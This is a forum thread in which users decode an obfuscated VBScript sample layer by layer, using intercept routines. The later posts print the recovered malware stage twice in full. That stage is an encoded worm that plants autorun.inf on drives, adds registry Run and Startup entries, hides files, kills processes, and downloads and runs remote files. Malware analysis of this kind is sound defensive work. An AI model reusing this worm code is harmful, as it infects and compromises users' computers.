China DOS Union

-- Unite DOS · Advance DOS · Grow DOS --

Union site: www.cn-dos.net Forum site: www.cn-dos.net/forum
DOS stands for freedom, openness and progress. Let us work hard, learn from the openness and GNU spirit of FreeDOS and Linux, and together build and grow a free GNU GPL world!

Guest Register Log in Members Blogs Search Command Prompt Bash Upload Statistics
中国DOS联盟论坛
The time now is 2026-06-29 15:11
Welcome new member 548840  RSS
48,003 topics / 350,080 posts / today 0 new / 48,221 members 不转换/ 简体中文/ 繁體中文(台灣)/ 繁體中文(香港)
中国DOS联盟论坛 » DOS批处理 & 脚本技术(批处理室) » [Help] Help to decrypt a VBS View 4,107 Replies 30
‹ Prev 1 2 3 Next › Tell a Friend Share to X Share to Weibo Share to Telegram Share to QQ Zone Copy Link QR Code
Floor 16 Posted 2008-01-16 12:56 ·  中国 北京 海淀区 联通
uhnmki
初级用户
Credits 73
Posts 11
Joined 2008-01-08 16:07
18-year member
UID 107997
Gender Male
Status Offline
Floor 17 Posted 2008-01-16 14:29 ·  中国 河北 保定 联通
baomaboy
银牌会员
★★★
Credits 1,513
Posts 554
Joined 2005-12-30 00:50
20-year member
UID 48180
Gender Male
Status Offline
Originally posted by uhnmki at 2008-1-16 12:56:
【续四】Open decode_5.txt and take a look, what is this stuff? It's so disappointing to everyone. How come there's only this little content? Did I get it wrong?

Sub Intercept (code)
WScript.Echo code
OutPutFile="decode_6.txt"
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)
objTXT.Write code
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
'**************Code to intercept the return value of the uc function, end


Because there is code that executes replacement in a loop, it is recommended to use the OpenTextFile method... Also, apply parameter 8 "append data mode" so that although duplicate code will be obtained, omissions can be avoided...
After running the code above with end sub added, the obtained code seems to have an error. It seems that the " symbol conversion is wrong after dyz=. Also, I just saw that the building above hopes to post continuously. I'm really sorry...

[ Last edited by baomaboy on 2008-1-16 at 02:50 PM ]
好多菩提树,好多明镜台。本来好多物,好多的尘埃。
Floor 18 Posted 2008-01-16 15:12 ·  中国 北京 科技网
uhnmki
初级用户
Credits 73
Posts 11
Joined 2008-01-08 16:07
18-year member
UID 107997
Gender Male
Status Offline
【Continuation 5】Now let's open decode_6.txt and see what the return value of the uc function generated at the end is:


on error resume next
dyz="ire=|9|:ogw=700:if=|.iof|:ir=|.ior|:pz=|%pbzfcrp% /p |:qsb=|/h#g/|:gvy=|UT |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|0qjhEcE|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|ii1<=676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs pp<>86 gura uq=|c|+up:ryfr uq=|$|+up:raq vs":gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>4 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>800 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>|<fpevcg>|}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|<fpevcg>| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1":eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)":fut=":function ":bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1":biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&||&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1":rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<yv}{v=v+1}{vs abg e.ngraqbsfgernz gura}{fyv=e.ernqyvar}{ryfr}{fyv=0}{raq vs}{ybbc}{eg=fyv}{ryfrvs yv<=0 gura}{eg=e.ernqnyy}{ryfr}{eg=0}{raq vs}{e.pybfr}{raq vs}{ryfr}{eg=0}{raq vs":wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|":rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0":arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat":eft=")):end function":dnz="ne ybp,0:frg kcbfg = perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva<>0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs":prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2":ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg":l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:":zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|Hnccl Nrjlrne!|):xz 1}{vs flf gura}{uv 1}{vs ee(|gvy|,1)<>gvy gura}{je |gvy|,gvy}{je |gwf|,ogw}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)<>pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs":aft=eft&fut:coz="qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7":rn="dim d:j=""\"":on error resume next":rsz="vs fj=1 naq ee(efc&efa,0)<>ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs":hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)":giz="vq=ee(|vqq|,1)}{qb juvyr svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1":dwz="vs ee(|trq|,1)<>sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100":usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)<>gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg":cuz="phf=ee(|bfj|,1)<>4}{qb}{qph=ee(|gtf|,1)<>pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=0 naq aa<>zva naq bb<>1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc":ext=":execute(uc(":kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs":cfz="vs eg(ju,1)<>|'|&ire gura ps=gehr":execute(ext&"dyz))"&ext&"zcx))"&fut&"gt()"&ext&"gtz"&aft&"ei(name,wt)"&ext&"eiz"&aft&"df(wh)"&ext&"dfz"&aft&"bf(wh,wt,da)"&ext&"bfz"&aft&"bi(wh)"&ext&"biz"&aft&"rt(wh,li)"&ext&"rtz"&aft&"wr(rna,rda)"&ext&"wrz"&aft&"rr(rna,pa)"&ext&"rrz"&aft&"ar(file,cg)"&ext&"arz"&aft&"dn(loc,web,ris,min)"&ext&"dnz"&aft&"pr(pcs,gs)"&ext&"prz"&aft&"ec(wt)"&ext&"ecz"&aft&"co(wh)"&ext&"coz"&aft&"rs(sw)"&ext&"rsz"&aft&"hi(sw)"&ext&"hiz"&aft&"gi(ids,fid,eid,fname,furl)"&ext&"giz"&aft&"dw(pcs,fn,furl,kill)"&ext&"dwz"&aft&"us(sw)"&ext&"usz"&aft&"cu()"&ext&"cuz"&aft&"km(sw)"&ext&"kmz"&aft&"cf(wh)"&ext&"cfz"&eft)
function er(sco)
if err.number<>0 or sco<0 then
err.clear
er=true
if sco<>0 and rr("ded",1)<>cstr(date) then
wr "oer",rr("oer",1)+abs(sco)
if rr("oer",1)>100 then wr "ded",date:wr "oer",0
end if
end if
end function

Wow, my god, it's still so messy. Dear readers, I'm sorry. It's a bit tiring for your eyes. I'm sorry to have made you excited too early. But fortunately, it's all ASCII code, which is better than the garbled code of b=lO+qO. And there are so many of them, which means the ciphertext b=lO+qO must have been substituted for decoding. Although it's a bit messy, I was like that at the beginning too. I got confused by two adjacent executes several times. But if you have EmEditor this text editor on hand, it's okay. It's clear at a glance. UEdit doesn't seem to work. Although UEdit has more functions than EmEditor, it's a bit stupid at this time. The effect EmEditor sees is similar to what I marked in the quote. In this way, you will immediately find that actually this is the assignment or string of several variables, and then there is a execute (code ), which is important. It will push the program to go further to the next step. Otherwise, it will stop here. In addition, a function er is brought at the end, which also refers to a function called rr. Regardless, the focus must be on the things inside the parentheses of execute(). It seems that many variables have been assigned above. Yes, it's it. If the code is decoded, it may be the plaintext (a bit lacking in confidence). So I still do that. Design an intercept program Intercept:

Sub Intercept (code)
WScript.Echo code
OutPutFile="decode_7'.txt"
Set objFSO=CreateObject("Scripting.FileSystemObject")
Set objTXT=objFSO.CreateTextFile(OutPutFile,True,False)
objTXT.Write code
objTXT.Close
Set objWSH=CreateObject("WScript.Shell")
objWSH.Run OutPutFile
WScript.Quit
End Sub

Use Intercept() to replace the execute() and get the code to be executed. So transform the above result like this:




on error resume next

dyz="ire=|9|:ogw=700:if=|.iof|:ir=|.ior|:pz=|%pbzfcrp% /p |:qsb=|/h#g/|:gvy=|UT |&ire:vas=|\nhgbeha.vas|}{frg jf=perngrbowrpg(|jfpevcg.furyy|):frg jzv=trgbowrpg(|jvaztzgf:\\.\ebbg\pvzi2|)}{frg sfb=perngrbowrpg(|fpevcgvat.svyrflfgrzbowrpg|):frg fvf=jzv.rkrpdhrel(|fryrpg * sebz jva32_bcrengvatflfgrz|)}{frg qp=sfb.qevirf:bhj=jfpevcg.fpevcgshyyanzr:jva=sfb.trgfcrpvnysbyqre(0)&w:qve=sfb.trgfcrpvnysbyqre(1)&w}{gzc=sfb.trgfcrpvnysbyqre(2)&w:jor=qve&|jorz\|:zve=yrsg(bhj,yra(bhj)-yra(jfpevcg.fpevcganzr))}{jfe=|perngrbowrpg(||jfpevcg.furyy||).eha|:pae=|\pbzchgreanzr|:pac=|HKLM\flfgrz\pheeragpbagebyfrg\pbageby|&pae&pae&pae}{pan=ee(pac,0):vs pan=|| gura pan=gvy}{ecn=|HKLM\fbsgjner\|&pan&w:ebc=|\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\rkcybere\|}{fs=|furyy sbyqref\|:sfc=ee(|HKLM|&ebc&fs&|pbzzba fgneghc|,0)&w&if:snc=ee(|HKCU|&ebc&fs&|snibevgrf|,0)&w}{qnc=ee(|HKCU|&ebc&fs&|qrfxgbc|,0)&w:efa=pan:ug=rp(|vijg?56|):un=rp(|:;9::<5xj9|):up=|0qjhEcE|:ur=rp(|p|+up)}{efc=|HKLM\fbsgjner\zvpebfbsg\jvaqbjf\pheeragirefvba\cbyvpvrf\rkcybere\eha\|:vs zve=qve gura flf=gehr}{sbe rnpu fv va fvf:pn=fv.pncgvba:pf=fv.pbqrfrg:pp=fv.pbhagelpbqr:bf=fv.bfynathntr:ji=fv.irefvba:arkg}{uvc=|HKCU|&ebc&|nqinaprq\fubjfhcreuvqqra|:uo=|ii1<=676k|&pue(124)&|e;|}{vs vafge(ji,|5.2|)<>0 gura}{uq=|g|+up}{ryfrvs pp<>86 gura uq=|c|+up:ryfr uq=|$|+up:raq vs":gtz="gwf=ee(|gwf|,1):qwf=ee(|qwf|,1):vs abg vfahzrevp(gwf) be abg vfqngr(qwf) gura je |gwf|,1:je |qwf|,qngr:qwf=ee(|qwf|,1)}{je |gwf|,gwf+1:jo=ce(|pyfza.rkr|,1)=1 be ce(|nc.rkr|,1)=1 be ce(|chojva.rkr|,1)=1}{vs qngr-pqngr(qwf)>4 gura td=gehr:jf.eha |arg fgneg ||gnfx fpurqhyre|||,0,snyfr}{vs (ee(|gwf|,1)>800 be jo be td be abg flf) naq ee(|qrq|,1)<>pfge(qngr) gura}{vq=ee(|vqq|,1):vs jo gura vq=1:wf=1:pq=0}{qb juvyr pq<>|<fpevcg>|}{vs wf=2 be wf=4 gura}{q2=qa(zve&gvy,ug+un+rp(uq)&vq,0,100):pq=eg(zve&gvy,1)}{ryfrvs wf=1 be wf=3 gura q1=qa(zve&gvy,ug+rp(uo)+rp(uq)&vq&|&i=|&ire,0,100):pq=eg(zve&gvy,1)}{raq vs:wf=wf+1:jm=q1=1 be q2=1:vs wf>4 gura}{vs jm gura tg=1}{rkvg qb}{raq vs}{vs jm gura re -1}{ybbc}{vs rv(zve&gvy,1) gura}{frg e=sfb.bcragrkgsvyr(zve&gvy,1)}{pva=e.ernqyvar:qvf=e.ernqyvar:qan=e.ernqyvar:qse=e.ernqyvar:air=e.ernqyvar:aeh=e.ernqyvar}{aan=e.ernqyvar:ase=e.ernqyvar:gfj=e.ernqyvar:gpb=e.ernqyvar:bfj=e.ernqyvar:vqq=e.ernqyvar}{e.pybfr:qs zve&gvy:vs pva=|<fpevcg>| gura}{je |gwf|,1:je |qwf|,qngr:je |vqq|,vqq:je |qan|,qan:je |gfj|,gfj:je |gpb|,gpb:je |bfj|,bfj}{vs air-ire>=1 be abg rv(qve&ir,1) gura qa qve&aan,ug&ase&qsb&aan,aeh,2000:jfpevcg.dhvg}{vs qvf=1 naq flf gura}{vs qan<>yr be abg rv(gzc&yr,1) gura qs gzc&yr:qa gzc&qan,ug&qse&qsb&qan,1,1000}{raq vs}{raq vs}{raq vs}{raq vs}{vs re(1) be jo gura tg=1":eiz="vs sfb.svyrrkvfgf(anzr) naq jg=1 gura rv=gehr}{vs sfb.sbyqrerkvfgf(anzr) naq jg=2 gura rv=gehr":dfz="ne ju,0}{vs rv(ju,1) gura sfb.qryrgrsvyr(ju)}{vs rv(ju,2) gura sfb.qryrgrsbyqre(ju)":fut=":function ":bfz="qs ju:frg ova=sfb.perngrgrkgsvyr(ju,gehr):ova.jevgryvar jg:ova.pybfr}{vs qn=1 gura ne ju,7}{vs abg re(0) gura os=1":biz="qs ju:frg v=sfb.perngrgrkgsvyr(ju,gehr):u=iopeys}{v.jevgryvar gvy&u&||&u&|bcra=jfpevcg.rkr .\|&if&u&|furyy\bcra\pbzznaq=jfpevcg.rkr .\|&if&u&|furyy\bcra\qrsnhyg=1|}{v.pybfr:ne ju,7:vs abg re(0) gura ov=1":rtz="vs yv<0 gura ju=bhj}{vs rv(ju,1) gura}{vs sfb.trgsvyr(ju).fvmr=0 gura}{eg=0}{ryfr}{frg e=sfb.bcragrkgsvyr(ju,1)}{frg py=sfb.bcragrkgsvyr(ju,1)}{py.ernqnyy}{gyv=py.yvar}{py.pybfr}{vs yv>0 naq yv<=gyv gura}{v=0 }{qb juvyr v<yv}{v=v+1}{vs abg e.ngraqbsfgernz gura}{fyv=e.ernqyvar}{ryfr}{fyv=0}{raq vs}{ybbc}{eg=fyv}{ryfrvs yv<=0 gura}{eg=e.ernqnyy}{ryfr}{eg=0}{raq vs}{e.pybfr}{raq vs}{ryfr}{eg=0}{raq vs":wrz="vs eqn=-1 gura jf.ertqryrgr ean ryfr jf.ertjevgr ecn&ean,eqn,|REG_SZ|":rrz="vs cn=1 gura ean=ecn&ean}{ee=jf.erternq(ean)}{vs re(0) gura ee=0":arz="vs rv(svyr,1) gura:frg bsvyr=sfb.trgsvyr(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat}{vs rv(svyr,2) gura:frg bsvyr=sfb.trgsbyqre(svyr):bsvyr.nggevohgrf=pt:frg bsvyr=abguvat":eft=")):end function":dnz="ne ybp,0:frg kcbfg = perngrbowrpg(|zvpebfbsg.kzyuggc|):kcbfg.bcra |trg|,jro,0:kcbfg.fraq()}{vs zva<>0 gura}{vs abg re(0) gura}{qa=1:frg ftrg=perngrbowrpg(|nqbqo.fgernz|) }{ftrg.zbqr=3:ftrg.glcr=1:ftrg.bcra():ftrg.jevgr(kcbfg.erfcbafrobql):ftrg.fnirgbsvyr ybp,2}{ne ybp,7}{vs rv(ybp,1) gura sfm=sfb.trgsvyr(ybp).fvmr ryfr sfm=0}{vs sfm>zva gura}{vs evf=1 gura jf.eha ybp}{ryfr}{qa=0:qs ybp}{raq vs}{raq vs}{raq vs":prz="frg cy=jzv.rkrpdhrel(|fryrpg * sebz jva32_cebprff jurer anzr='|&cpf&|'|):v=1}{sbe rnpu c va cy:v=v+1}{vs v>nof(tf) gura ce=1}{vs tf<0 gura vs c.grezvangr=2 naq ce=1 gura jf.eha pz&|gfxvyy |&yrsg(c.anzr,yra(c.anzr)-4),0,snyfr}{arkg}{vs re(0) gura ce=2":ecz="sbe v=1 gb yra(jg):rp=rp+pue(nfp(zvq(jg,v,1))-v):arkg":l="d=125:f=123:j=124:h=97:m=109:r=13:k=110:n=122:s=-13:u=0:v=0:":zcx="sbe rnpu q va qp}{vs zve=q&w gura jf.eha |rkcybere |&q,3,snyfr}{arkg}{bhp=eg(bhj,-1):vs ps(bhj) gura zftobk(|Hnccl Nrjlrne!|):xz 1}{vs flf gura}{uv 1}{vs ee(|gvy|,1)<>gvy gura}{je |gvy|,gvy}{je |gwf|,ogw}{je |qwf|,qngr}{je |qrq|,0}{raq vs}{vs ee(|ngq|,1)=1 gura jf.eha |ng /q /l|,0,snyfr:je |ngq|,0}{vs ee(efc&efa,0)=ir gura ef -1}{yr=ee(|qan|,1):vs rv(gzc&yr,1) gura jf.eha gzc&yr}{xz 0}{ph:re 1}{jfpevcg.fyrrc 1000}{vs ee(|qrq|,1)<>pfge(qngr) gura jf.eha bhj}{ryfr}{jfpevcg.fyrrc 5000}{vs ce(|jfpevcg.rkr|,2)=2 gura}{vs ee(|gwp|,1)=pfge(qngr) gura:jfpevcg.dhvg:ryfr:je |gwp|,qngr}{raq vs}{vs ce(|jfpevcg.rkr|,2)=1 gura jfpevcg.dhvg}{ne bhj,7:pb qve&ir:pb jva&ir:ef 1:jf.eha qve&ir}{raq vs":aft=eft&fut:coz="qs ju:frg iof=sfb.perngrgrkgsvyr(ju,gehr):iof.jevgr bhp:iof.pybfr:ne ju,7":rn="dim d:j=""\"":on error resume next":rsz="vs fj=1 naq ee(efc&efa,0)<>ir gura}{jf.ertjevgr efc&efa,ir,|REG_SZ|}{vs re(0) naq abg rv(sfc,1) gura os sfc,jfe&| |||&ir&||||,0}{ryfrvs fj=-1 gura:qs sfc}{ryfrvs fj=0 gura:qs sfc:je efc&efa,-1:je ecn,-1}{raq vs":hiz="vs fj=1 gura jf.ertjevgr uvc,|0|,|REG_DWORD|}{vs fj=0 gura uv=ee(uvc,0)":giz="vq=ee(|vqq|,1)}{qb juvyr svq<=rvq:vqp=vqp&|,|&svq:svq=svq+1:ybbc}{vqf=vqf&vqp:vqff=fcyvg(vqf,|,|)}{sbe v=0 gb hobhaq(vqff)}{vs vq=vqff(v) gura vs abg rv(gzc&sanzr,1) gura qa gzc&sanzr,ug&shey,0,2000}{arkg}{vs rv(gzc&sanzr,1) gura jf.eha gzc&sanzr}{tv=1":dwz="vs ee(|trq|,1)<>sa naq ce(cpf,1)=1 gura}{vs qa(gzc&sa,ug&shey,0,2000)=1 gura qjp=1}{vs rv(gzc&sa,1) naq qjp=1 gura}{vs xvyy=1 gura ce cpf,-1}{jf.eha gzc&sa}{vs abg re(0) gura je |trq|,sa:qa 0,ug+rp(uo)+ur+sa,0,0:vs xvyy=2 gura ce cpf,-1:xz 1}{raq vs}{qj=1}{raq vs}{jfpevcg.fyrrc 100":usz="sbe rnpu q va qp}{vs q.qevirglcr=3 be (q.qevirglcr=1 naq q<>|A:| naq q<> |B:|) gura}{vs fj=1 gura}{vs rv(q&vas,2) gura qs q&vas}{vs rv(q&w&if,1) naq rv(q&vas,1) gura}{vs eg(q&vas,1)<>gvy gura ov q&vas}{ryfr}{uv 1:ov q&vas:pb q&w&if}{raq vs}{ryfrvs fj=-1 gura:qs q&vas:qs q&w&if}{ryfr:os q&w&if,jfe&|(yrsg(jfpevcg.fpevcgshyyanzr,3)),3|&fgevat(10000,|'|),1:qs q&vas}{raq vs}{raq vs}{arkg":cuz="phf=ee(|bfj|,1)<>4}{qb}{qph=ee(|gtf|,1)<>pfge(qngr)}{vs (frpbaq(gvzr) zbq 3)=0 gura}{vs qph naq phf gura hf 1}{zva=zvahgr(abj):vs (zva zbq 2)=0 naq aa<>zva naq bb<>1 gura aa=zva:bb=tg:xz 0}{vs ee(|gfj|,1)=1 gura rkrphgr(hp(ee(|gpb|,1)))}{raq vs}{jfpevcg.fyrrc 900}{vs uv(0)=1 naq qph gura je |gtf|,qngr:hf -1}{vs ce(|gnfxzte.rkr|,1)=1 gura:jf.eha |ng |&gvzr+0.003&| /vagrenpgvir |&ir,0,snyfr:je |ngq|,1:uv 1:jfpevcg.dhvg}{ybbc":ext=":execute(uc(":kmz="vs fj=1 gura}{ef 0:hf -1:qs bhj:qs jva&ir:qs qve&ir:qs jor&ir:jfpevcg.dhvg}{ryfr}{ef 1}{vs ps(qve&ir) gura pb qve&ir}{vs ps(jva&ir) gura pb jva&ir}{raq vs":cfz="vs eg(ju,1)<>|'|&ire gura ps=gehr":Intercept(ext&"dyz))"&ext&"zcx))"&fut&"gt()"&ext&"gtz"&aft&"ei(name,wt)"&ext&"eiz"&aft&"df(wh)"&ext&"dfz"&aft&"bf(wh,wt,da)"&ext&"bfz"&aft&"bi(wh)"&ext&"biz"&aft&"rt(wh,li)"&ext&"rtz"&aft&"wr(rna,rda)"&ext&"wrz"&aft&"rr(rna,pa)"&ext&"rrz"&aft&"ar(file,cg)"&ext&"arz"&aft&"dn(loc,web,ris,min)"&ext&"dnz"&aft&"pr(pcs,gs)"&ext&"prz"&aft&"ec(wt)"&ext&"ecz"&aft&"co(wh)"&ext&"coz"&aft&"rs(sw)"&ext&"rsz"&aft&"hi(sw)"&ext&"hiz"&aft&"gi(ids,fid,eid,fname,furl)"&ext&"giz"&aft&"dw(pcs,fn,furl,kill)"&ext&"dwz"&aft&"us(sw)"&ext&"usz"&aft&"cu()"&ext&"cuz"&aft&"km(sw)"&ext&"kmz"&aft&"cf(wh)"&ext&"cfz"&eft)

function er(sco)

if err.number<>0 or sco<0 then

err.clear

er=true

if sco<>0 and rr("ded",1)<>cstr(date) then

